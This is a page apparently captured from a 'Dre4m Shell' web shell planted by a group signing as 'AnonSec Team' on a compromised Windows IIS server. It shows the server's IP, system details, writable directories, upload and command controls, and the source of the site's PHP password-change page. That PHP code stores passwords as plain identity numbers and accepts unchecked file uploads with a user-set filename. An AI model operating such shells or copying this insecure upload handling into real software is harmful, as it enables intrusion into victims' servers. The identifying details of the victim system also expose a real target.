Dre4m Shell
Server IP : 103.6.199.200  /  Your IP : 18.118.162.8
Web Server : Microsoft-IIS/10.0
System : Windows NT EMPUSA 10.0 build 20348 (Windows Server 2016) i586
User : EMPUSA$ ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Domains/smsmalor/smsmalorsetar.com/wwwroot/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/Domains/smsmalor/smsmalorsetar.com/wwwroot/tukar_kl_pbs.php
<?php require_once('Connections/mentorpbs.php'); ?>
<?php require_once('Connections/mentorpbs.php'); ?>

<?php
if (!isset($_SESSION)) {
  session_start();
}
$MM_authorizedUsers = "";
$MM_donotCheckaccess = "true";
?>

<?php
if (!function_exists("GetSQLValueString")) {
function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "") 
{
  $theValue = get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue;

  $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue);

  switch ($theType) {
    case "text":
      $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
      break;    
    case "long":
    case "int":
      $theValue = ($theValue != "") ? intval($theValue) : "NULL";
      break;
    case "double":
      $theValue = ($theValue != "") ? "'" . doubleval($theValue) . "'" : "NULL";
      break;
    case "date":
      $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
      break;
    case "defined":
      $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue;
      break;
  }
  return $theValue;
}
}

$editFormAction = $_SERVER['PHP_SELF'];
if (isset($_SERVER['QUERY_STRING'])) {
  $editFormAction .= "?" . htmlentities($_SERVER['QUERY_STRING']);
}

if ((isset($_POST["MM_update"])) && ($_POST["MM_update"] == "form1")) {
  $updateSQL = sprintf("UPDATE login SET password=%s WHERE id=%s",
                       GetSQLValueString($_POST['password'], "text"),
                       GetSQLValueString($_POST['id'], "int"));

  mysql_select_db($database_mentorpbs, $mentorpbs);
  $Result1 = mysql_query($updateSQL, $mentorpbs) or die(mysql_error());

  $updateGoTo = "logout_cpwpbs.php";
  if (isset($_SERVER['QUERY_STRING'])) {
    $updateGoTo .= (strpos($updateGoTo, '?')) ? "&" : "?";
    $updateGoTo .= $_SERVER['QUERY_STRING'];
  }
  header(sprintf("Location: %s", $updateGoTo));
}

if ((isset($_POST["MM_update"])) && ($_POST["MM_update"] == "form1")) {
  $updateSQL = sprintf("UPDATE borangpkm1 SET nokpguru=%s WHERE id_borang=%s",
                       GetSQLValueString($_POST['password'], "text"),
                       GetSQLValueString($_POST['id_borang'], "int"));

  mysql_select_db($database_mentorpbs, $mentorpbs);
  $Result1 = mysql_query($updateSQL, $mentorpbs) or die(mysql_error());

  $updateGoTo = "logout_cpwpbs.php";
  if (isset($_SERVER['QUERY_STRING'])) {
    $updateGoTo .= (strpos($updateGoTo, '?')) ? "&" : "?";
    $updateGoTo .= $_SERVER['QUERY_STRING'];
  }
  header(sprintf("Location: %s", $updateGoTo));
}

if ((isset($_POST["MM_update"])) && ($_POST["MM_update"] == "form1")) {
  $updateSQL = sprintf("UPDATE guru SET nokpguru=%s WHERE id_guru=%s",
                       GetSQLValueString($_POST['password'], "text"),
                       GetSQLValueString($_POST['id_guru'], "int"));

  mysql_select_db($database_mentorpbs, $mentorpbs);
  $Result1 = mysql_query($updateSQL, $mentorpbs) or die(mysql_error());

  $updateGoTo = "logout_cpwpbs.php";
  if (isset($_SERVER['QUERY_STRING'])) {
    $updateGoTo .= (strpos($updateGoTo, '?')) ? "&" : "?";
    $updateGoTo .= $_SERVER['QUERY_STRING'];
  }
  header(sprintf("Location: %s", $updateGoTo));
}

$colname_Recordset_cpw = "-1";
if (isset($_SESSION['MM_Password'])) {
  $colname_Recordset_cpw = $_SESSION['MM_Password'];
}
mysql_select_db($database_mentorpbs, $mentorpbs);
$query_Recordset_cpw = sprintf("SELECT * FROM login INNER JOIN borangpkm1 ON borangpkm1.nokpguru=login.password INNER JOIN guru ON guru.nokpguru = login.password WHERE password = %s", GetSQLValueString($colname_Recordset_cpw, "text"));
$Recordset_cpw = mysql_query($query_Recordset_cpw, $mentorpbs) or die(mysql_error());
$row_Recordset_cpw = mysql_fetch_assoc($Recordset_cpw);
$totalRows_Recordset_cpw = mysql_num_rows($Recordset_cpw);
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<?php
if (isset($_POST['btn_uploadpic']))
{
	$id=$_POST['hf_nama'];
	move_uploaded_file($_FILES["file"]["tmp_name"],"images/login_photo/".$id.".jpg");
	
}

?>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
<style type="text/css">
<!--
.style1 {
	font-size: 24px;
	color: #0000FF;
}
-->
</style>
</head>

<body>
<div align="center" class="style1">MENUKAR KATA LALUAN<br />
  LOGIN KE PEMENTORAN PENTAKSIRAN</div>
<p>&nbsp;</p>
<p align="center"><img src="images/login_photo/<?php echo $_SESSION['MM_Username']; ?>.jpg" alt="" width="138" height="169" /></p>
<table width="371" border="0" align="center">
  <tr>
    <td><div align="center">
      <form action="" method="post" enctype="multipart/form-data" name="form2" id="form2">
        <label>
          <input type="file" name="file" id="file" />
          <input type="submit" name="btn_uploadpic" id="btn_uploadpic" value="Upload Gambar" />
          </label>
        <input name="hf_nama" type="hidden" id="hf_nama" value="<?php echo $_SESSION['MM_Username']; ?>" />
      </form>
    </div></td>
  </tr>
</table>
<p align="center">&nbsp;</p>

<form action="<?php echo $editFormAction; ?>" method="post" name="form1" id="form1">
  <table align="center">
    <tr valign="baseline">
      <td nowrap="nowrap" align="right">Username:</td>
      <td><?php echo $_SESSION['MM_Username']; ?></td>
    </tr>
    <tr valign="baseline">
      <td nowrap="nowrap" align="right">Password (alpha-numeric or symbol max 12 digits / chrs):</td>
      <td><input type="text" name="password" value="<?php echo htmlentities($row_Recordset_cpw['password'], ENT_COMPAT, 'utf-8'); ?>" size="32" /></td>
    </tr>
    <tr valign="baseline">
      <td colspan="2" align="right" nowrap="nowrap">&nbsp;</td>
    </tr>
    <tr valign="baseline">
      <td colspan="2" align="right" nowrap="nowrap"><div align="center">
        <input type="submit" value="KEMAS KINI" />
      </div></td>
    </tr>
  </table>
  
  <div align="center">
    <input type="hidden" name="id" value="<?php echo $row_Recordset_cpw['id']; ?>" />
    <input type="hidden" name="MM_update" value="form1" />
    <input type="hidden" name="id" value="<?php echo $row_Recordset_cpw['id']; ?>" />
    <input name="id_borang" style="display: none" type="text" id="id_borang" value="<?php echo $row_Recordset_cpw['id_borang']; ?>" />
    <label>
    <input name="id_guru" style="display: none" type="text" id="id_guru" value="<?php echo $row_Recordset_cpw['id_guru']; ?>" />
  </label>
    <br />
    <br />
  *</div>
</form>

<p>&nbsp;</p>

<p>&nbsp;</p>
</body>
</html>
<?php

mysql_free_result($Recordset_cpw);
?>

Anon7 - 2022
AnonSec Team